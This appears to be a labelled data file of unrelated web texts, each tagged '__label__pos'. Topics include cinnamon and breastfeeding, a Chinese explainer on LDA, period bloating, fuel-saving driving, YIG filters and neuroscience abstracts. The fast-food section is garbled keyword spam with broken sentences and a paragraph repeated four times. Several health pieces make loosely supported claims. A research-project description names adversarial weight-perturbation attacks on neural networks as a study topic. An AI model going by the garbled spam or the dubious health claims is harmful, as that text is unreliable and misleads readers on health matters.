cinnamon, a person can reap the health benefits from cinnamon without needing to put large quantities of it into their food. However, most of the risks around using cinnamon while breastfeeding revolve around taking cinnamon supplements. Your baby faces the following risks when you take cinnamon while breastfeeding: • Risk of an allergic reaction (hives, swelling of tongue and throat, burning sensation in mouth) • Lowered blood sugar • Thinning of blood It’s important to ask your doctor about taking cinnamon supplements while breastfeeding. Although these supplements pose risks to your child, your doctor will be more equipped to advise you of the risks. Can you eat cinnamon while breastfeeding? Ceylon Cinnamon BUY ON AMAZON Cinnamon, when used in food, is generally considered safe for new moms who are breastfeeding. Most of the risk to your baby occurs when you take cinnamon supplements or eat large quantities of cinnamon while breastfeeding. The amounts of cinnamon used in certain foods may not pose as much risk to your breastfeeding child. If you regularly eat dishes with cinnamon in them, you should take note of how your child reacts to your milk. If your baby refuses to drink, develops indigestion, or shows signs of an allergic reaction, discontinue consuming cinnamon. For babies with sensitivities to cinnamon, even small amounts consumed by the mother can cause problems. If you’re unsure about whether cinnamon is causing your child’s symptoms, consult your doctor. Your doctor should be able to give you information about the risks and benefits of eating cinnamon while breastfeeding. Can I drink cinnamon tea while breastfeeding? Can-I-drink-cinnamon-tea-while-breastfeeding BUY IN AMAZON Cinnamon tea can be a relaxing and beneficial drink to breastfeeding mothers. Women enjoy drinking cinnamon tea because it boosts immunity and metabolism while aiding in digestion. However, drinking too much cinnamon tea while breastfeeding can be risky for your newborn. Instead of using cinnamon powder, brew your cinnamon tea lightly with one small cinnamon stick. It’s also important to make sure you’re only having one cup of cinnamon tea each day, especially if you’re consuming other cinnamon. If your child exhibits symptoms of cinnamon sensitivity, discontinue cinnamon tea and consult your doctor. Conclusion Despite its health benefits, cinnamon may pose significant risk to your breastfeeding baby when used in large amounts. When you consume large quantities of cinnamon, your baby is at increased risk of digestive issues. In addition to this, some babies have allergic reactions to cinnamon that can be life-threatening. If your baby exhibits signs of indigestion or a cinnamon allergy, discontinue cinnamon consumption and consult your doctor. Your doctor can help you determine if cinnamon consumption is causing your baby’s health problems. Related: Can I Drink Slimfast While Breastfeeding Can You Take Elderberry While Breastfeeding Ashwagandha While Breastfeeding – Is It Safe? Herbalife While Breastfeeding
__label__pos
0.948059
歡迎光臨 每天分享高質量文章 教科書上的LDA為什麼長這樣? 作者丨DeAlVe 學校丨某211碩士生 研究方向丨樣式識別與機器學習 線性判別分析(Linear Discriminant Analysis, LDA)是一種有監督降維方法,有關機器學習的書上一定少不了對 PCA 和 LDA 這兩個演算法的介紹。LDA 的標準建模形式是這樣的(這裡以兩類版本為例,文章會在幾個關鍵點上討論多類情況): 其中,是類間散佈矩陣,是類內散佈矩陣, w 是投影直線: 怎麼樣,一定非常熟悉吧,經典的 LDA 就是長這個樣子的。這個式子的標的也十分直觀:將兩類樣本投影到一條直線上,使得投影后的類間散佈矩陣與類內散佈矩陣的比值最大。 三個加粗的詞隱含著三個問題: 1. 為什麼是類間散佈矩陣呢?直接均值之差 m1-m2 不是更符合直覺嗎?這樣求出來的解和原來一樣嗎?  2. 為什麼是投影到直線,而不是投影到超平面?PCA 是把 d 維樣本投影到 c 維 (c 3. 為什麼是類間散佈與類內散佈的比值呢?差值不行嗎?  這篇文章就圍繞這三個問題展開。我們先回顧一下經典 LDA 的求解,然後順次講解分析這三個問題。 回顧經典LDA 原問題等價於這個形式: 然後就可以用拉格朗日乘子法了: 求導並令其為 0: 得到解: 對矩陣進行特征值分解就可以得到 w。但是有更簡單的解法: 而其中是一個標量,所以和 λw 共線,得到: 求解完畢。非常優雅,不愧是教科書級別的經典演算法,整個求解一氣呵成,標準的拉格朗日乘子法。但是求解中還是用到了一個小技巧:是標量,從而可以免去特征值分解的麻煩。 那麼,我們能不能再貪心一點,找到一種連這個小技巧都不需要的求解方法呢?答案是可以,上面的問題在下一節中就能得到解決。 類間散佈 & 均值之差 我們不用類內散佈矩陣了,改用均值之差 m1-m2 這個更符合直覺的東西: 還是用拉格朗日乘子法: 求導並令其為 0: 得到解: 怎麼樣,是不是求解更簡單了呢?不需要任何技巧,一步一步下來就好了。 為什麼說均值之差更符合直覺呢?大家想啊,LDA 的目的是讓投影后的兩類之間離得更遠,類內離得更近。說到類內離得更近能想到的最直接的方法就是讓類內方差最小,這正是類內散佈矩陣;說到類間離得更遠能想到的最直接的方法肯定是讓均值之差最大,而不是均值之差與自己的克羅內克積這個奇怪的東西最大。 那麼經典 LDA 為什麼會用類間散佈矩陣呢?我個人認為是這樣的運算式看起來更加優雅:分子分母是齊次的,並且這個東西恰好就是廣義瑞利商: 雖然經典 LDA 求解沒有上面這個方法直接,但是問題表述更加規範,所用到的技巧也非常簡單,不會給是使用者帶來困擾,所以 LDA 最終採用的就是類間散佈矩陣了吧。 直線 & 超平面 上面那個問題只算是小打小鬧,沒有太大的意義,但是這個問題就很有意義了:LDA 為什麼直接投影到直線(一維),而不能像 PCA 一樣投影到超平面(多維)呢? 我們試試不就完了。  假設將樣本投影到上,其中每一個 wi 都是經典 LDA 中的 w 。也就相當於我們不是把樣本投影到一條直線上,而是投影到 c 條直線上,也就相當於投影到了超平面上。投影后的樣本坐標為: 所以樣本的投影過程就是: 那麼,均值的投影過程也是這樣: 投影后的均值之差的二範數: 為什麼不用第一行的向量內積而偏要用第二行的跡運算呢?因為這樣可以拼湊出類間散佈來,和經典 LDA 保持形式的一致。 回顧一下經典 LDA 的形式: 現在我們有了,還缺個約束,類比一下就可以得到了: 實際上,約束也可以選擇成,這兩個約束實際上都是在限制 W 的解空間,得出來的解是等價的,這兩個約束有什麼區別呢?我只發現了一點:  回想是 c 條投影直線,為了確保向這 c 條直線投影能等價於向 c 維子空間投影,我們需要保證 c 條直線是線性無關的,即  rank(W) =c。看一下約束: 右邊是秩為 c 的單位矩陣,因為矩陣乘積的秩不大於每一個矩陣的秩,所以左邊這三個矩陣的秩都要不小於 c,因此我們得到了 rank(W) = c。也就是說,能夠保證我們在向一個 c 維子空間投影。而約束中沒有顯式地表達這一點 我對矩陣的理解還不夠深入,不知道是否也隱含了對秩的約束,所以為了保險起見,我選擇了帶有顯式秩約束的,這樣就得到了我們的高維投影版 LDA: 下麵來求解這個問題。還是拉格朗日乘子法: 求導並令其為 0: 得到了: 在大部分情況下,一些協方差矩陣的和是可逆的。即使不可逆,上面這個也可以用廣義特征值問題的方法來求解,但是這裡方便起見我們認為可逆: 我們只要對進行特征值分解,就可以得到 d 個特征向量了,挑出最大特征值對應的 c 個特征向量來組成 W,我們不就得到向 c 維子空間的投影了嗎? 真的是這樣嗎? 不是這樣的。誠然,我們可以選出 c 個特征向量,但是其中只有 1 個特征向量真正是我們想要的,另外 c-1 個沒有意義。 觀察: 發現了嗎?等式右邊的 (m1-m2) 是一個向量,換句話說,是一個秩為 1 的矩陣。那麼,這個乘積的秩也不能大於 1,並且它不是 0 矩陣,所以: 秩為 1 的矩陣只有 1 個非零特征值,也只有 1 個非零特征值對應的特征向量 w。 可能有人會問了,那不是還有零特征值對應的特征向量嗎,用它們不行嗎? 不行。來看一下標的函式: 我們剛纔得到的最優性條件: 所以標的函式為: 而我們的 W 只能保證 λ1, λ2, …, λd 中的一個非零,無論我們怎麼選取剩下的 c-1 個 w,標的函式也不會再增大了,因為唯一一個非零特征值對應的特征向量已經被選走了。  所以,兩類 LDA 只能向一條直線投影。  這裡順便解釋一下 K 類 LDA 為什麼只能投影到 K-1 維,其實道理是一樣的。K 類 LDA 的類間散佈矩陣是: 可以看出,是 K 個秩一矩陣的和(因為 mk-m 是秩一的向量),所以它的秩最大為 K。並且,所以這 K 項中有一項可以被線性表出。所以,的秩最大為 K-1。也即: 只有 K-1 個非零特征值。所以,K 類 LDA 最高只能投影到 K-1 維。 咦?剛纔第三個問題怎麼提的來著,可不可以不用比值用差值,用差值的話會不會解決這個投影維數的限制呢? 比值 & 差值 經典 LDA 的標的函式是投影后的類間散佈與類內散佈的比值,我們很自然地就會想,為什麼非得用比值呢,差值有什麼不妥嗎? 再試試不就完了。  註意,這一節我們不用向量 w,而使用矩陣 W 來討論,這也就意味著我們實際上在同時討論二類 LDA 和多類 LDA,只要把換成對應的就好了。 註意到可以通過放縮 W 來得到任意大的標的函式,所以我們要對 W 的規模進行限制,同時也進行秩限制: 也就得到了差值版的 LDA: 依然拉格朗日乘子法: 求導並令其為 0: 得到了: ,有: 可以得到: 若括號內的東西可逆,則上式可以寫為: 註意到, 的秩不大於 K-1,說明等號左邊的秩不大於 K-1,那麼等號右邊的秩也不大於 K-1,即: 所以我們還是會遇到秩不足,無法求出 K-1 個以上的非零特征值和對應的特征向量。這樣還不夠,我們還需要證明的一點是,新的標的函式在零特征值對應的特征向量下依然不會增加。 標的函式(稍加變形)為: 再利用剛纔我們得到的最優性條件(稍加變形): 所以標的函式為: 結論沒有變化,新的標的函式依然無法在零特征值的特征向量下增大  綜合新矩陣依然秩不足零特征值依然對新標的函式無貢獻這兩點,我們可以得到一個結論:用差值代替比值也是可以求解的,但是我們不會因此受益。  既然比值和差值算出來的解性質都一樣,那麼為什麼經典 LDA 採用的是比值而不是差值呢?  我個人認為,這可能是因為比值算出來的解還有別的直覺解釋,而差值的可能沒有,所以顯得更優雅一些。什麼直覺解釋呢?  在二分類問題下,經典 LDA 是最小平方誤差準則的一個特例。若讓第一類的樣本的輸出值等於 N/N1 ,第二類樣本的輸出值等於 -N/N2 , N 代表相應類樣本的數量,然後用最小平方誤差準則求解這個模型,得到的解恰好是(用比值的)LDA 的解。這個部分 PRML 上有講解。 總結 這篇文章針對教科書上 LDA 的標的函式丟擲了三個問題,並做了相應解答,在這個過程中一步一步深入理解 LDA。 第一個問題:可不可以用均值之差而不是類間散佈? 答案:可以,這樣做更符合直覺,並且更容易求解。但是採用類間散佈的話可以把 LDA 的標的函式表達成廣義瑞利商,並且上下齊次更加合理。可能是因為這些原因,經典 LDA 最終選擇了類間散佈。 第二個問題:可不可以把 K 類 LDA 投影到大於 K-1 維的子空間中? 答案:不可以,因為類間散佈矩陣的秩不足。K 類 LDA 只能找到 K-1 個使標的函式增大的特征值對應的特征向量,即使選擇了其他特征向量,我們也無法因此受益。 第三個問題:可不可以用類間散佈與類內散佈的差值,而不是比值? 答案:可以,在新準則下可以得到新的最優解,但是我們無法因此受益,K 類 LDA 還是只能投影到 K-1 維空間中。差值版 LDA 與比值版 LDA 相比還缺少了一個直覺解釋,可能是因為這些原因,經典 LDA 最終選擇了比值。 所以,教科書版 LDA 如此經典是有原因的,它在各個方面符合了人們的直覺,本文針對它提出的三個問題都沒有充分的理由駁倒它,經典果然是經典。 點擊以下標題查看其他相關文章:  #投 稿 通 道#  讓你的論文被更多人看到  如何才能讓更多的優質內容以更短路徑到達讀者群體,縮短讀者尋找優質內容的成本呢? 答案就是:你不認識的人。 總有一些你不認識的人,知道你想知道的東西。PaperWeekly 或許可以成為一座橋梁,促使不同背景、不同方向的學者和學術靈感相互碰撞,迸發出更多的可能性。  PaperWeekly 鼓勵高校實驗室或個人,在我們的平臺上分享各類優質內容,可以是最新論文解讀,也可以是學習心得技術乾貨。我們的目的只有一個,讓知識真正流動起來。 來稿標準: • 稿件確系個人原創作品,來稿需註明作者個人信息(姓名+學校/工作單位+學歷/職位+研究方向)  • 如果文章並非首發,請在投稿時提醒並附上所有已發佈鏈接  • PaperWeekly 預設每篇文章都是首發,均會添加“原創”標誌 ? 投稿郵箱: • 投稿郵箱:[email protected]  • 所有文章配圖,請單獨在附件中發送  • 請留下即時聯繫方式(微信或手機),以便我們在編輯發佈時和作者溝通 ? 現在,在「知乎」也能找到我們了 進入知乎首頁搜索「PaperWeekly」 點擊「關註」訂閱我們的專欄吧 關於PaperWeekly PaperWeekly 是一個推薦、解讀、討論、報道人工智慧前沿論文成果的學術平臺。如果你研究或從事 AI 領域,歡迎在公眾號後臺點擊「交流群」,小助手將把你帶入 PaperWeekly 的交流群里。 ▽ 點擊 | 閱讀原文 | 獲取最新論文推薦 赞(0) 分享創造快樂
__label__pos
0.927999
Causes and effects of fast food Does fast food cause obesity this page explores the 4 ways that fast food contributes to the obesity problem. International journal of scientific & technology research volume 5, issue 04, april 2016 issn 2277-8616 279 ijstr©2016 wwwijstrorg. Get an answer for 'i am writing an essay on the effects of fast food on the human body i am having trouble putting all the facts into paragraphs all the things eating fast food causes (heart disease, weight gain, bad eating habits, etc) are all happening because of the same reason, how bad the food is. 11 side effects of fast food april 21, 2011 april 4 obesity is also a leading cause of diabetes - so eating fast food doesn't help you decrease your odds stroke heartburn is a common side effect of fast food consumption. Obesity in children increases the more hours they watch television children's exposure to tv ads for unhealthy food products (ie, high-calorie, low-nutrient snacks, fast foods and sweetened drinks) are a significant risk factor for obesity. A recent study evaluating the effects of fast-food-based overeating on liver enzymes and liver triglyceride content has been making the news this week how. Here are 10 worst effects of fast food the top disadvantages of fast foods fast food are the dangers of eating, caused for heart diseases and diabetes. Childhood obesity causes & consequences recommend on facebook tweet share compartir on this page low-nutrient foods and beverages obesity during childhood can have a harmful effect on the body in a variety of ways. The oac's sponsored membership program is an excellent way for physicians and surgeons to help engage patients in the cause and the oac fast food - is it the enemy by sarah choosing a typical fast food meal every day can lead to increased calories which can lead to weight gain and. The effects of fast food more drinks offered at fast food restaurants even caffeine, which causes them in your metabolism to speed up a bit ' focused a large part of this process on the effects of the production of beef on the rainforest. Fast food and obesity - the cause and effect relationship toggle navigation fast food and obesity - the cause and effect relationship by melissa darcey on june 15, 2017 did you know that 75¾ of the american population is likely to be overweight and obese by 2020. The food industry claims their products are not the primary cause of compared with kids that did not eat fast food, fast food days, they ate 126 calories more calories on days when they ate fast food continued children and adolescents who ate fast food. Fast food in the us has grown from a $6 billion-a-year industry in 1970 [1] than whites—and fast food is one of the main causes of this deadly disparity effects of eating out on nutrition and body weight. Fast food culture not only can fast food directly cause negative mental effects, the bodily changes associated with regular consumption of junk food can also lead to snowballing mental impacts. Another cause of eating junk food is advertising in fact, the fast food industry spent more than $42 billion dollars in 2009 on tv advertising and other media therefore, people like to try new food every day, so these advertisements help them a lot. Causes and effects of fast food causes and effects of fast food Rates of obesity and insulin resistance have climbed sharply over the past 30 years these epidemics are temporally related to a dramatic rise in consumption of fast food until recently, it was not known whether the fast food was driving the obesity, or vice versa we review the unique properties of fast food that make it the ideal obesigenic. The effect of fast food restaurants on obesity and weight gain janet currie, stefano dellavigna, enrico moretti, vikram pathania nber working paper no 14721 issued in february 2009, revised in december 2011. Get access to causes and effects of the popularity of fast food restaurants essays only from anti essays listed results 1 - 30 get studying today and. The fast food industry has a harmful effect on society 1211 words | 5 pages thesis: the fast food industry has a harmful affect on society topic sentence 1: fast food causes coronary artery disease. Cause: we cut trees excessively effects: rivers dry low rainfall poor harvest no food for the population list of cause and effect essay topics causes and effects of unemployment. Explain the causes for the popularity of fast food restaurants in this modern lifestyle the popularity of fast food restaurants are growing every dayfast food restaurants have appeared in large quantities all over the world and these restaurants have become more popular, because fast food can be prepared and served very fast. Paper discusses effects of eating fast food on obesity. Fast foods often contain too many calories and too little nutrition the effects of fast food on the body when you take in high amounts of carbs, it causes a spike in your blood sugar. Explain the causes for the popularity of fast food restaurants many people, particularly young people, prefer to eat fast food instead of cooking meals at. See, in many cases, fast food is highly processed and contains large amounts of carbohydrates eating fast food may cause skin issues such as acne anxiety and depression aren't the only mental effects that fast food can induce. A new study along the same lines as its predecessors shows how eating fast food is linked to a greater risk of suffering from depression. Causes long-term effects how government millions of people in the united states get sick from contaminated food symptoms of food poisoning include upset stomach symptoms may range from mild to severe bacteria and viruses bacteria and viruses are the most common cause of food poisoning. Causes and effects of the popularity of fast food restaurants all over the world why are they so attractive for clients and what results it may have. causes and effects of fast food Rates of obesity and insulin resistance have climbed sharply over the past 30 years these epidemics are temporally related to a dramatic rise in consumption of fast food until recently, it was not known whether the fast food was driving the obesity, or vice versa we review the unique properties of fast food that make it the ideal obesigenic. causes and effects of fast food Rates of obesity and insulin resistance have climbed sharply over the past 30 years these epidemics are temporally related to a dramatic rise in consumption of fast food until recently, it was not known whether the fast food was driving the obesity, or vice versa we review the unique properties of fast food that make it the ideal obesigenic. causes and effects of fast food Rates of obesity and insulin resistance have climbed sharply over the past 30 years these epidemics are temporally related to a dramatic rise in consumption of fast food until recently, it was not known whether the fast food was driving the obesity, or vice versa we review the unique properties of fast food that make it the ideal obesigenic. causes and effects of fast food Rates of obesity and insulin resistance have climbed sharply over the past 30 years these epidemics are temporally related to a dramatic rise in consumption of fast food until recently, it was not known whether the fast food was driving the obesity, or vice versa we review the unique properties of fast food that make it the ideal obesigenic. Causes and effects of fast food Rated 5/5 based on 40 review Similar articles to causes and effects of fast food 2018.
__label__pos
0.727788
COVID-19 Reporting and Information • HEERF I & II Security Vulnerabilities in Deep Learning Deployment to Edge Devices in CPSs Project (4): Security Vulnerabilities in Deep Learning Deployment to Edge Devices in CPSs Deep learning has outperformed the conventional machine learning approaches. Deep learning uses the raw data itself to learn intrinsic features and make a classification or detection. This is achieved by building an architecture with a number of layers where each layer learns a certain feature inside the input data by transforming it into another abstraction. The initial layers (e.g Convolution layers and Pooling layers) learn low level features while the deeper layers (deeper Convolutional layer and fully connector layers) learn complex features by representing the data in a higher abstraction. Therefore, having a number of layers between the lowest and the highest layers gives a freedom to learn more complex features compared to their ancestors which have limited number of layers. There are different phases of deep learning, including a training phase, testing phase and validation (inference) phase. Although deep learning is a very promising technique, its deployment into edge devices to perform inference phase of the deep learning on-site, requires further investigation. Firstly, deep learning architectures are very complex, and hence, compressing it into the reduced processing capabilities of edge devices is a challenge. Secondly, the compressed deployments bring their own security vulnerability issues. In this project, the REU students will investigate the new security challenges associated with such deep neural network (DNN) architectures. Studying Deep Convolutional Neural Network Architectures against Adversarial Training. Recently, It has been proven an attack scenario where carefully and uniformly adding weight perturbations can lead to maliciously erroneous training results. However, for large DNN, such weight perturbations can be noticeable and easy to detect. In this research task, the REU students will further investigate the effect of weight perturbation on a small subset of weights. We will utilize the combination of identification of critical weights with the optimization problem of weigh perturbation, such as hardware oriented Fast Gradient Sign Method (FGSM) and Jacobian-based Saliency Map Approach (JSMA). Qualifications: Matlab, c/c++, microcontroller programming, EE, CmpE or CmpSci major, knowledge of encryption. Mentor: Dr. Hasan ([email protected]) Experience Tech For Yourself Visit us to see what sets us apart. Schedule Your Visit 2021 NSF Research Experiences for Undergraduates (REU)
__label__pos
0.963133
Chronix: Long Term Storage and Retrieval Technology for Anomaly Detection in Operational Data Authors:  Florian Lautenschlager, QAware GmbH; Michael Philippsen and Andreas Kumlehn, Friedrich-Alexander-Universität Erlangen-Nürnberg; Josef Adersberger, QAware GmbH Abstract:  Anomalies in the runtime behavior of software systems, especially in distributed systems, are inevitable, expensive, and hard to locate. To detect and correct such anomalies (like instability due to a growing memory consumption, failure due to load spikes, etc.) one has to automatically collect, store, and analyze the operational data of the runtime behavior, often represented as time series. There are efficient means both to collect and analyze the runtime behavior. But traditional time series databases do not yet focus on the specific needs of anomaly detection (generic data model, specific built-in functions, storage efficiency, and fast query execution). The paper presents Chronix, a domain specific time series database targeted at anomaly detection in operational data. Chronix uses an ideal compression and chunking of the time series data, a methodology for commissioning Chronix’ parameters to a sweet spot, a way of enhancing the data with attributes, an expandable set of analysis functions, and other techniques to achieve both faster query times and a significantly smaller memory footprint. On benchmarks Chronix saves 20%–68% of the space that other time series databases need to store the data and saves 80%–92% of the data retrieval time and 73%–97% of the runtime of analyzing functions. Open Access Media USENIX is committed to Open Access to the research presented at our events. Papers and proceedings are freely available to everyone once the event begins. Any video, audio, and/or slides that are posted after the event are also free and open to everyone. Support USENIX and our commitment to Open Access. BibTeX @inproceedings {202329, author = {Florian Lautenschlager and Michael Philippsen and Andreas Kumlehn and Josef Adersberger}, title = {Chronix: Long Term Storage and Retrieval Technology for Anomaly Detection in Operational Data}, booktitle = {15th {USENIX} Conference on File and Storage Technologies ({FAST} 17)}, year = {2017}, isbn = {978-1-931971-36-2}, address = {Santa Clara, CA}, pages = {229--242}, url = {https://www.usenix.org/conference/fast17/technical-sessions/presentation/lautenschlager}, publisher = {{USENIX} Association}, month = feb, } Presentation Audio
__label__pos
0.908117
Here’s Why Your Jeans Likely Won’t Fit Right Before Period Mother Nature’s monthly gift is limiting your outfit choices yet again. No matter how hard you pull at the seams, regardless of how much you suck in, your favorite pair of jeans just won’t fit. Abdominal swelling, bags under your eyes and other unpleasant indicators can be quite frustrating for every woman! The term for this is swelling or bloating, a common symptom of premenstrual syndrome (PMS). It feels like we're swelling everywhere roughly one to two weeks before menses, depending on your personal cycle. While you may certainly feel bloated from head to toe, the most common areas to swell are the breasts, face, abdomen, legs, ankles, and feet. Whether you experience PMS or not, bloating before the period can become a really nasty problem at times. Let’s dive into the nature of this process to learn why exactly the swelling happens. Is it normal? So, is this extreme discomfort normal? Yes. Not only is it normal to experience bloating from your menstrual cycle – it is estimated that on average, 8 out of 10 women share this recurrent anguish. Bloating is a common early symptom of menstruation that many women experience. It may feel like you’ve gained weight or like your abdomen or other parts of your body are tight or even swollen. You’ll likely experience bloating well before the start of your period. About 5 days before your period, the feeling of bloating increases, and then is at its peak on the first day of a monthly period. You may bloat every month, once in a while, or not at all. Relief from bloating may occur immediately after you start your period or a few days into it. The mechanism explained A lot of the bloating symptoms are caused by water retention that is increased by hormonal changes associated with the menstrual cycle, doctors explain. So, once again, the short answer is hormones. In the lead up to menstruation, our levels of sex hormones – progesterone and estrogen – are a bit all over the place. Lowered levels of progesterone are basically what causes our bodies to start bleeding, but these hormone changes are also thought to be the leading cause of why our stomachs feel so bloated and full around this time. PMS occurs during the final phase of your menstrual cycle. That’s when the hormones estrogen and progesterone can fluctuate. It’s also when the lining of your uterus gets thicker. If you become pregnant, the fertilized egg attaches to your thickened uterine lining. If you’re not pregnant, the thickened lining leaves your body, and you have a period. At the end of your cycle when you're about to get your period, if you haven't gotten pregnant, what usually happens is the progesterone and estrogen levels plummet. About a week before a woman's period starts, levels of the hormone progesterone fall. Research suggests that changes in progesterone and estrogen levels cause the body to retain more water and salt. The body's cells become swollen with water, causing the feeling of bloating and/or a swollen abdomen. Increased blood flow to the uterus can cause uterine swelling, which also leads to a bloated abdomen. Relief from the feeling of bloating happens immediately after the start of monthly periods or a few days into it. As your period days pass by, the water retention declines rapidly and your tummy becomes flattened and the feeling of bloating vanishes. Not just the hormones Hormones may not be the only reason you have physical symptoms leading up to your period, experts note. Other causes for your symptoms may relate to your genes, the type and amount of vitamins and minerals you take, your diet, especially if it’s high in salt, and the number of drinks and foods you have with caffeine of alcohol. Dehydration can also cause water retention before (and sometimes during) your period. When the body needs to keep more fluid, it retains water to counter dehydration. A study conducted in 2010 showed that these hormone changes can cause more water and salt retention in the abdomen, meaning that the swollen feeling is actually due to a build-up of fluid and salts rather than the fact that we've just eaten an entire container of Ben & Jerry's. As it turns out though, it could also be because of that too – grim, we know. Our old friend stress can have an impact on the digestive system, which can often be a symptom of PMS and affect you during your period. Which is unsurprising we tend to reach for carb-rich comfort food during this stage in the cycle, which adds to an already sluggish digestive system. Low levels of serotonin tend to make us want to stuff our faces with things like chocolate, chips, and whatever unhealthy crap we can find at a gas station at 11 pm. This (you guessed it) makes us bloat. Mild to moderate bloating that begins before your period and goes away soon after your period starts is generally nothing to worry about. As long as you’re able to function normally and your symptoms occur around your period, most likely all you need to do to reduce the symptoms is try some lifestyle modifications. However, if you have more severe bloating that gets in the way of your daily activities, talk to your doctor. #TameYourPeriod Leave behind embarrassing rashes, annoying skin irritations, and all other unpleasant sensations together with your old menstrual pad brand.  Sale Unavailable Sold Out
__label__pos
0.549397
Techniques for Drivers to Conserve Fuel Drivers can conserve fuel by learning how different driving behaviors affect fuel economy and by adopting techniques to save fuel and money. The amount of fuel your vehicle consumes depends heavily on how you drive. See the information below and FuelEconomy.gov for information about driving efficiently. Slow Down and Drive Conservatively Photo of car on highway. Speeding increases fuel consumption and decreases fuel economy as a result of tire rolling resistance and air resistance. While vehicles reach optimal fuel economy at different speeds, gas mileage usually decreases rapidly at speeds above 50 miles per hour (mph). For light-duty vehicles, for example, every 5 mph you drive over 50 mph is like paying $0.30 more per gallon of gas (based on the price of gas at $4.32 per gallon). Reducing your speed by 5 to 10 mph can improve fuel economy by 7%–14%. Using cruise control on the highway can help drivers maintain a constant speed; vehicles use the most energy when accelerating. Obeying the speed limit, accelerating and braking gently and gradually, and reading the road ahead can improve the fuel economy of your vehicle by 15%–30% at highway speeds and 10%–40% in stop-and-go traffic. Driving more sensibly is also much safer for you and others. Combine Trips Combining trips can save you time and money by avoiding unnecessary stopping and starting of your vehicle, which can be an issue in colder climates where it takes longer for your engine to reach its most fuel-efficient temperature. Shorter trips can use twice as much fuel as one long, multi-purpose trip that covers the same distance, when the engine is warm and at its most fuel-efficient temperature. Engine and transmission friction increases with cold engine oil and other drive-line fluids, making the engine less efficient. Trip planning can reduce the distance you travel and the amount of time you drive with a cold engine. For information on how cold weather affects fuel economy, see FuelEconomy.gov’s Fuel Economy in Cold Weather page. Reduce Vehicle Load The additional weight of items left in a vehicle requires more fuel to propel your vehicle. An extra 100 pounds in your trunk, for example, could reduce your fuel economy by about 1%. Hauling rooftop cargo also increases drag, which can reduce fuel economy from 2%–8% in city driving, 6%–17% on the highway, and 10%–25% at 65–75 mph. Offload any unnecessary items to reduce the fuel consumption of your vehicle. Get Direct Feedback Drivers may find it difficult to recognize opportunities to conserve fuel while driving. A 2018 study by the National Center for Sustainable Transportation found that instantaneous or in-vehicle feedback affects driver behavior and improves fuel economy on average of 6.6% and can result in even greater driving improvements when combined with other strategies, such as driver training or performance-based rewards. Vehicle manufacturers are increasingly providing instant driver feedback through in-vehicle displays. For example, Honda's ECO Assist and HondaLink features involve a sophisticated feedback system that teaches drivers how to drive more efficiently and what behaviors affect their fuel economy. Similarly, Ford’s SmartGauge with EcoGuide feature can help drivers achieve the best fuel efficiency by anticipating future driving situations to help inform the most fuel-efficient driving behaviors. Aftermarket feedback devices are also available.
__label__pos
0.903531
YIG sphere From Wikipedia, the free encyclopedia Jump to navigation Jump to search Simplified schematics of YIG-resonator coupling to microstrip network YIG filter partially disassembled Yttrium iron garnet spheres (YIG spheres) serve as magnetically tunable filters and resonators for microwave frequencies. YIG filters are used for their high Q factors, typically between 100 and 200.[1][2] A sphere made from a single crystal of synthetic yttrium iron garnet acts as a resonator. These spheres are on the order of 0.5 mm in diameter and are manufactured from slightly larger cubes of diced material by tumbling, as is done in the manufacture of jewelry. The garnet is mounted on a ceramic rod, and a pair of small loops around the sphere couple fields into and out of the sphere; the loops are half-turns, positioned at right-angles to each other to prevent direct electromagnetic coupling between them and each is grounded at one end. The field from an electromagnet changes the resonance frequency of the sphere and hence the frequency it will allow to pass. The advantage of this type of filter is that the garnet can be tuned over a very wide frequency range by varying the strength of the magnetic field. Some filters can be tuned from 3 GHz up to 50 GHz. YIG filters usually consist of several coupled stages, each stage consisting of a sphere and a pair of loops. The input and output coils are oriented at right angles to one another around the YIG crystal. They are cross-coupled when energized by the ferrimagnetic resonance frequency, which depends on the external magnetic field supplied by an electromagnet. YIG filters are often used as preselectors. YIG filters tuned by a sweep current are used in spectrum analyzers. Another YIG application is YIG oscillators, where the sphere acts as a tunable frequency-determining element. It is coupled to an amplifier which provides the required feedback for oscillation.[3] References[edit] 1. ^ YIG Tuned Filters 2. ^ U.L. Rohde, and A.K. Poddar, "Cost-Effective, Power-Efficient and Configurable YIG Replacement Signal Source," German Microwave Conference-GeMiC 2006, 28-30 March 2006, Germany. 3. ^ YIG Tuned Oscillators Further reading[edit] • Joseph Helszajn (1985). YIG Resonators and Filters. New York: John Wiley & Sons. ISBN 9780608009599. External links[edit]
__label__pos
0.804684
  2-1 Dr. Price and Native Diets (start video at 1:50) The following is a video from my SLIM! Keto Reset Course. It is foundational to understand REAL Health. Dr. Price was a dentist in the 1930's who believed diet may have a connection to the structure of a person's teeth. He traveled over 300,000 miles to prove his hypothesis! He found that Indigenous people groups who had never touched "civilization's foods" like white flour, white sugar and canned or processed foods had better teeth stucture and healthier lives. He also found similarities in their diets although they did vary according to where they lived. **Questions for Reflection Module 2-1 • Write in your journal foods from the native diets that you would like, like to try or that you already have incorporated into your diet.
__label__pos
0.857074
Learn More Autobiographical memory includes the retrieval of personal semantic data and the remembrance of incident or episodic memories. In retrograde amnesias, it has been observed that recall of autobiographical memories of recent events is poorer than recall of remote memories. Alzheimer's disease (AD) may also be associated with a temporal gradient (TG) in memory(More) Emotional information can be conveyed by various means of communication, such as propositional content, speech intonation, facial expression, and gestures. Prior studies have demonstrated that inputs from one modality can alter perception in another modality. To evaluate the impact of emotional intonation on ratings of emotional faces, a behavioral study(More) Functional magnetic resonance imaging was used to investigate hemodynamic responses to adjectives pronounced in happy and angry intonations of varying emotional intensity. In separate sessions, participants judged the emotional valence of either intonation or semantics. To disentangle effects of emotional prosodic intensity from confounding acoustic(More) To detect that a conversational turn is intended to be ironic is a difficult challenge in everyday language comprehension. Most authors suggested a theory of mind deficit is crucial for irony comprehension deficits in psychiatric disorders like schizophrenia; however, the underlying pathophysiology and neurobiology are unknown and recent research highlights(More) One remarkable aspect of the human motor repertoire is the multitude of bimanual actions it contains. Still, the neural correlates of coordinated movements, in which the two hands share a common goal, remain debated. To address this issue, we designed two bimanual circling tasks that differed only in terms of goal conceptualization: a "coordination" task(More) By using diffusion tensor magnetic resonance imaging (DTI) and subsequent tractography, a perisylvian language network in the human left hemisphere recently has been identified connecting Brocas's and Wernicke's areas directly (arcuate fasciculus) and indirectly by a pathway through the inferior parietal cortex. Applying DTI tractography in the present(More) BACKGROUND Memory disturbance is a common symptom of multiple sclerosis (MS), but little is known about autobiographical memory deficits in the long-term course of different MS subtypes. Inflammatory activity and demyelination is pronounced in relapsing-remitting multiple sclerosis (RRMS) whereas, similar to Alzheimer's disease, neurodegeneration affecting(More) The present functional magnetic 